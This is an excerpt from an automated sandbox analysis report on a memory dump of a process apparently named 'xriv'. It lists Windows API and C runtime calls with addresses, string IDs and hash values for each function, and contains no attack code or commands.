                                                                      • Instruction Fuzzy Hash: 9F210771604507BFDB28AF698C84D6B77AEEF083A8711412CFA1993142EB31EC4187A1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _wcsrchr
                                                                      • String ID: .bat$.cmd$.com$.exe
                                                                      • API String ID: 1752292252-4019086052
                                                                      • Opcode ID: e98c8b33d4e694527aa003b2e5bea5e81580bea5b8806c6add14a07f27989f48
                                                                      • Instruction ID: 2a233ef51bbd4ab0075fc19a5350298c25a5fc325326f283e5d5a1292f1a31b4
                                                                      • Opcode Fuzzy Hash: e98c8b33d4e694527aa003b2e5bea5e81580bea5b8806c6add14a07f27989f48
                                                                      • Instruction Fuzzy Hash: 3101D63B608F2725672C209D9C05B275BEC8FD2BB4726002EFA48F7280FF94D8034198
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: api-ms-
                                                                      • API String ID: 0-2084034818
                                                                      • Opcode ID: e22cd47196560f3e13d2ce121551643deafa10b628c84d9c7747d9d74c7eddc9
                                                                      • Instruction ID: 67d0586da0a61f0e670ca457b85798e6cd6d96ffa99fb2dd0e1d45677f430702
                                                                      • Opcode Fuzzy Hash: e22cd47196560f3e13d2ce121551643deafa10b628c84d9c7747d9d74c7eddc9
                                                                      • Instruction Fuzzy Hash: 60113F31A01A2BABDF3E8AADDC48B5A3BD49F01678B120524E916A7291F730ED00C6D1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,011EA9D8,011EE000,?,011EA9A0,011EAF26,?,011EE000), ref: 011EA9F8
                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 011EAA0B
                                                                      • FreeLibrary.KERNEL32(00000000,?,?,011EA9D8,011EE000,?,011EA9A0,011EAF26,?,011EE000), ref: 011EAA2E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                      • API String ID: 4061214504-1276376045
                                                                      • Opcode ID: c078f0e12de4ca07dbec7f259cd6c28f4e17f71face0db32058f7fae00fb95fc
                                                                      • Instruction ID: 75d51c36f2498296156022a6d594f7856d0b464cff8187b92950d183cbbc7e58
                                                                      • Opcode Fuzzy Hash: c078f0e12de4ca07dbec7f259cd6c28f4e17f71face0db32058f7fae00fb95fc
                                                                      • Instruction Fuzzy Hash: 25F02731601219FBDB29DB91DE0DBCD7EB5EF40705F00006CF600A2060CB748E40DB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,011EB0E0), ref: 011EB1D0
                                                                      • GetFileInformationByHandle.KERNEL32(?,?), ref: 011EB22A
                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,011EB0E0,?,000000FF,00000000,00000000), ref: 011EB2B8
                                                                      • __dosmaperr.LIBCMT ref: 011EB2BF
                                                                      • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 011EB2FC
                                                                        • Part of subcall function 011EB524: __dosmaperr.LIBCMT ref: 011EB559
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
                                                                      • String ID:
                                                                      • API String ID: 1206951868-0
                                                                      • Opcode ID: 2e8c2c8906b9a0acea84fa22e9fa28c5d5bdd06d02e7942fc2b3721ec8b257ae
                                                                      • Instruction ID: a3c03a621ed98eb2687372fa6c560132787911e629c6c2fe20da2745504d1d2b
                                                                      • Opcode Fuzzy Hash: 2e8c2c8906b9a0acea84fa22e9fa28c5d5bdd06d02e7942fc2b3721ec8b257ae
                                                                      • Instruction Fuzzy Hash: 9A415E75904A05AFDB28DFF5D8899AFBBF9FF89300B00452DE956D3610EB30A840CB65
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • _free.LIBCMT ref: 011F13B4
                                                                        • Part of subcall function 011ED653: HeapFree.KERNEL32(00000000,00000000,?,011F142F,?,00000000,?,?,?,011F1456,?,00000007,?,?,011F1858,?), ref: 011ED669
                                                                        • Part of subcall function 011ED653: GetLastError.KERNEL32(?,?,011F142F,?,00000000,?,?,?,011F1456,?,00000007,?,?,011F1858,?,?), ref: 011ED67B
                                                                      • _free.LIBCMT ref: 011F13C6
                                                                      • _free.LIBCMT ref: 011F13D8
                                                                      • _free.LIBCMT ref: 011F13EA
                                                                      • _free.LIBCMT ref: 011F13FC
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                      • String ID:
                                                                      • API String ID: 776569668-0
                                                                      • Opcode ID: d916644d6672f48bbcb359165df0eb83d16a3e66d8989d1f5605f817edad8a9a
                                                                      • Instruction ID: cda73bacb1f9d8d0393828e9dc8b56dde859b70bab6909dce0243f6925e6a960
                                                                      • Opcode Fuzzy Hash: d916644d6672f48bbcb359165df0eb83d16a3e66d8989d1f5605f817edad8a9a
                                                                      • Instruction Fuzzy Hash: 0BF04F32904A01BBDA2DEA99F489C0B7BD9EA047243944D0AE25CD7955CB30F8C08A98
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _free
                                                                      • String ID: *?
                                                                      • API String ID: 269201875-2564092906
                                                                      • Opcode ID: 7496f51c3f35c99317c8ac37739540d6bea978ec628f8cc924bc48588b70b313
                                                                      • Instruction ID: a80b5233fe403517d6e0983a52ae1b39bfc746e4cde00db4b597b856823ae2f7
                                                                      • Opcode Fuzzy Hash: 7496f51c3f35c99317c8ac37739540d6bea978ec628f8cc924bc48588b70b313
                                                                      • Instruction Fuzzy Hash: FE613B75D0061A9FDF19CFE8C8849ADFBF5EF48314B24816AD815E7340E7719E428B90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 011E8FA2
                                                                      • CatchIt.LIBVCRUNTIME ref: 011E9088
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CatchEncodePointer
                                                                      • String ID: MOC$RCC
                                                                      • API String ID: 1435073870-2084237596
                                                                      • Opcode ID: e4066e1f3e7de2e6ed1caa4a43ff201aab4b17184f98d3b20af5145bd358741c
                                                                      • Instruction ID: f634f304bac11658aec9960a13ad99c27e6324e9f6c4079d183521be36973acf
                                                                      • Opcode Fuzzy Hash: e4066e1f3e7de2e6ed1caa4a43ff201aab4b17184f98d3b20af5145bd358741c
                                                                      • Instruction Fuzzy Hash: 8E415771900609AFDF1ADFD8C888AEEBBFABF48308F184159FA14A6251D3359950DB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AdjustPointer
                                                                      • String ID:
                                                                      • API String ID: 1740715915-0
                                                                      • Opcode ID: 1b4258faa5b6fea531a239ff73f139273258b32b3bc2fba7c40082501553ccc9
                                                                      • Instruction ID: cacc65385f37203949f923ef5fc9fe5ae9715cfc3be9b6781dc6fbb2acd486f5
                                                                      • Opcode Fuzzy Hash: 1b4258faa5b6fea531a239ff73f139273258b32b3bc2fba7c40082501553ccc9
                                                                      • Instruction Fuzzy Hash: 40511671A00A06AFEB2D8FD8D848BBABBE4FF84304F14056DDE0157691E731E980C791
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetVersionExW.KERNEL32(0000011C,?,9BC7B195,00000000), ref: 011D4D89
                                                                      • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 011D4DF0
                                                                      • GetProcAddress.KERNEL32(00000000), ref: 011D4DF7
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AddressHandleModuleProcVersion
                                                                      • String ID:
                                                                      • API String ID: 3310240892-0
                                                                      • Opcode ID: 3fe6d6fa2c28b9055f36368755b14721868f4efe0aa29e0b7c69bf664fb5677c
                                                                      • Instruction ID: 44d531453a2e427f0d426126883757a692310e0aafcd9dfe0c10e8470e0d1f16
                                                                      • Opcode Fuzzy Hash: 3fe6d6fa2c28b9055f36368755b14721868f4efe0aa29e0b7c69bf664fb5677c
                                                                      • Instruction Fuzzy Hash: 7D512971D04228ABEB2CEF68CD487DDBBB5EB45314F5042A8E415A7AC1EB345EC08F91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • _free.LIBCMT ref: 011F509E
                                                                      • _free.LIBCMT ref: 011F50C7
                                                                      • SetEndOfFile.KERNEL32(00000000,011F25FD,00000000,011ED4F0,?,?,?,?,?,?,?,011F25FD,011ED4F0,00000000), ref: 011F50F9
                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,011F25FD,011ED4F0,00000000,?,?,?,?,00000000), ref: 011F5115
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _free$ErrorFileLast
                                                                      • String ID:
                                                                      • API String ID: 1547350101-0
                                                                      • Opcode ID: b849c184b89e5c05e270ed81d7e7f42820a159767df4738f0db8806e7f097269
                                                                      • Instruction ID: 43e693abb2b13db36e6d2ea86f139680e1332434c125d164a2386b9864392935
                                                                      • Opcode Fuzzy Hash: b849c184b89e5c05e270ed81d7e7f42820a159767df4738f0db8806e7f097269
                                                                      • Instruction Fuzzy Hash: BF41D772900A069BDB5DABACCC44B9E3BB7AF55364F290518FB14A7291EB30D84087A5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 011EAE0F: _free.LIBCMT ref: 011EAE1D
                                                                        • Part of subcall function 011F0971: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,011F4B40,?,00000000,00000000), ref: 011F0A13
                                                                      • GetLastError.KERNEL32 ref: 011EFA02
                                                                      • __dosmaperr.LIBCMT ref: 011EFA09
                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 011EFA48
                                                                      • __dosmaperr.LIBCMT ref: 011EFA4F
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                      • String ID:
                                                                      • API String ID: 167067550-0
                                                                      • Opcode ID: ac106e45f0ebeefda2a8ef7f8c4123c89d7d6e417e59293915e5afbc36e01aa4
                                                                      • Instruction ID: 2a56f5bfcc75b6805f5993dec62d212124197faff42ec309ca6270ddb839f29a
                                                                      • Opcode Fuzzy Hash: ac106e45f0ebeefda2a8ef7f8c4123c89d7d6e417e59293915e5afbc36e01aa4
                                                                      • Instruction Fuzzy Hash: AF21FB72604E07BF9B1DAFE98C8882777EDFF842687018519FD599B141E730ED418791
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetLastError.KERNEL32(?,00000000,?,011EAD8D,00000000,?,?,?,011EAF26,?), ref: 011EDF49
                                                                      • _free.LIBCMT ref: 011EDFA6
                                                                      • _free.LIBCMT ref: 011EDFDC
                                                                      • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,?,011EAF26,?), ref: 011EDFE7
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorLast_free
                                                                      • String ID:
                                                                      • API String ID: 2283115069-0
                                                                      • Opcode ID: af3e7b150c2fd5b37b0e2b6939a0c1880191fa0053a4ce15a5a3e22740d7d085
                                                                      • Instruction ID: f4341a2478e0bc45aa857f6d0147697a700e5ef08ebf2ddfd667eae1d8d22800
                                                                      • Opcode Fuzzy Hash: af3e7b150c2fd5b37b0e2b6939a0c1880191fa0053a4ce15a5a3e22740d7d085
                                                                      • Instruction Fuzzy Hash: 3911E972609D022AEE2E76F8BC8CE2B25DA9FD15787250234F628D32D1DF718C528652
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetLastError.KERNEL32(?,?,?,011EB7F5,011EDB7F,?,?,011E8272,?,?,?,?,?,011D20C3,?,?), ref: 011EE0A0
                                                                      • _free.LIBCMT ref: 011EE0FD
                                                                      • _free.LIBCMT ref: 011EE133
                                                                      • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,011E8272,?,?,?,?,?,011D20C3,?,?), ref: 011EE13E
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorLast_free
                                                                      • String ID:
                                                                      • API String ID: 2283115069-0
                                                                      • Opcode ID: d3e01a5f25724693ef59979cef4ccadad7545fc6934621da862cd2bed92435f8
                                                                      • Instruction ID: 22c209a01c181283b27cb92a5ee7395a606c385b2650d45928cc7723e7643380
                                                                      • Opcode Fuzzy Hash: d3e01a5f25724693ef59979cef4ccadad7545fc6934621da862cd2bed92435f8
                                                                      • Instruction Fuzzy Hash: 3011C071706E022AD62E27F97C8CD6715D99BD56787160334F128D32D1DF718C514611
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,011EE9E2,00000000,?,011F370A,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 011EE893
                                                                      • GetLastError.KERNEL32(?,011F370A,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,011EE9E2,00000000,00000104,?), ref: 011EE89D
                                                                      • __dosmaperr.LIBCMT ref: 011EE8A4
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorFullLastNamePath__dosmaperr
                                                                      • String ID:
                                                                      • API String ID: 2398240785-0
                                                                      • Opcode ID: 8c0aeec9fbe75a9737b8652c2caf4d5cdc2ce13c1accfd2a0b103e403ee951be
                                                                      • Instruction ID: 8697927e2d331cddbfac5a249a6eeebce7e2db33740f92592831acc4c960cfc9
                                                                      • Opcode Fuzzy Hash: 8c0aeec9fbe75a9737b8652c2caf4d5cdc2ce13c1accfd2a0b103e403ee951be
                                                                      • Instruction Fuzzy Hash: 5DF08132601916BBDB281FE6DC0CC46BFEAFF542A03054925F62DC6560C731E860CBD1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,011EE9E2,00000000,?,011F3695,00000000,00000000,011EE9E2,?,?,00000000,00000000,00000001), ref: 011EE8FC
                                                                      • GetLastError.KERNEL32(?,011F3695,00000000,00000000,011EE9E2,?,?,00000000,00000000,00000001,00000000,00000000,?,011EE9E2,00000000,00000104), ref: 011EE906
                                                                      • __dosmaperr.LIBCMT ref: 011EE90D
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorFullLastNamePath__dosmaperr
                                                                      • String ID:
                                                                      • API String ID: 2398240785-0
                                                                      • Opcode ID: 1f53d005e0083d911dc42c2a13e89fa121867a03f06f6d91ba77024fe4689651
                                                                      • Instruction ID: 7fb4c3196de7f4f11537b1e9bc0ecee27bda8b2f147da9a2cf14a4facd81374a
                                                                      • Opcode Fuzzy Hash: 1f53d005e0083d911dc42c2a13e89fa121867a03f06f6d91ba77024fe4689651
                                                                      • Instruction Fuzzy Hash: 4AF08132601916BB8B381FE6D84C946BFEAFF442A03054528F62DC6520E731E861CBD1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • WriteConsoleW.KERNEL32(011D5140,0000000F,012068F8,00000000,011D5140,?,011F5AA7,011D5140,00000001,011D5140,011D5140,?,011F2ECD,00000000,?,011D5140), ref: 011F63A6
                                                                      • GetLastError.KERNEL32(?,011F5AA7,011D5140,00000001,011D5140,011D5140,?,011F2ECD,00000000,?,011D5140,00000000,011D5140,?,011F3421,011D5140), ref: 011F63B2
                                                                        • Part of subcall function 011F6378: CloseHandle.KERNEL32(FFFFFFFE,011F63C2,?,011F5AA7,011D5140,00000001,011D5140,011D5140,?,011F2ECD,00000000,?,011D5140,00000000,011D5140), ref: 011F6388
                                                                      • ___initconout.LIBCMT ref: 011F63C2
                                                                        • Part of subcall function 011F633A: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,011F6369,011F5A94,011D5140,?,011F2ECD,00000000,?,011D5140,00000000), ref: 011F634D
                                                                      • WriteConsoleW.KERNEL32(011D5140,0000000F,012068F8,00000000,?,011F5AA7,011D5140,00000001,011D5140,011D5140,?,011F2ECD,00000000,?,011D5140,00000000), ref: 011F63D7
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                      • String ID:
                                                                      • API String ID: 2744216297-0
                                                                      • Opcode ID: 5d3119f84be7b81615f32dbda15428eaad7ebebc8a7fba1dadd0b6da30d3ab1e
                                                                      • Instruction ID: d4b5896a7bd9a3a330fe09e151bd4ff626f00e6f11a5a48cba3a132c6d431ab8
                                                                      • Opcode Fuzzy Hash: 5d3119f84be7b81615f32dbda15428eaad7ebebc8a7fba1dadd0b6da30d3ab1e
                                                                      • Instruction Fuzzy Hash: D0F03736505259BBCF372F95EC08D9A3F66FB19261B014028FB2C95220C7328960DB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SleepConditionVariableCS.KERNELBASE(?,011E7157,00000064), ref: 011E71DD
                                                                      • LeaveCriticalSection.KERNEL32(01209708,000000FF,?,011E7157,00000064,?,?,?,011D3E30,0120C468,9BC7B195,?,00000000,011F8818,000000FF), ref: 011E71E7
